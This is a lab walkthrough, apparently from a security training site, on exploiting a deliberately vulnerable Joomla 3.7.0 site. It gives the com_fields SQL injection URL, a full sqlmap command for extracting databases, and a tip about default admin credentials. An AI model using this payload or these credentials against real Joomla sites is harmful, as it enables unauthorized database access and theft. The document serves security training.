Let’s see, if you can find any known vulnerabilities in this website which is using Joomla CMS . If there are any vulnerabilities, search for their exploits too. Click on the button below to take the
Last updated
Step 1: Go to the URL to access the lab (The URL may be different for each user).
http://13.127.128.105/Vulnerable-CMS/Variant-3/
Step 2: Download Owasp Joomscan tool from this link.
Also, make sure you have installed Perl.
Step 3: Extract the files.
Step 4: Open the terminal or command prompt and type this command:
joomscan -u http://url
hit enter.
Step 5: Joomscan will tell you that the version of joomla is 3.7.0. On Google search for “Joomla 3.7.0” exploit, you will come across the following exploit:
Step 6: As you can see that it is an SQL injection exploit and the exploit says that the vulnerable URL is:
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Step 7: Now replace the http://localhost with the URL where Joomla is found in the practice lab i.e. {url}
So the complete URL becomes:
{url} index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
When you will open this, you will see an SQL error confirming the vulnerability
Step 8: To exploit SQL injection vulnerability open SQLmap in terminal or command prompt and copy the command (as given in the exploit db exploit)
sqlmap -u "{url}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] and press enter. (Make sure to enter your lab URL)
Now proceed with the same approach to extract Database.
NOTE: Before doing all this, you could simply search “Joomla default password” and you will come to know that the default username is “admin” and the default password is “password”. These passwords work in the practice lab too hence there are 2 vulnerabilities:
Using CMS with known vulnerability CMS with default password
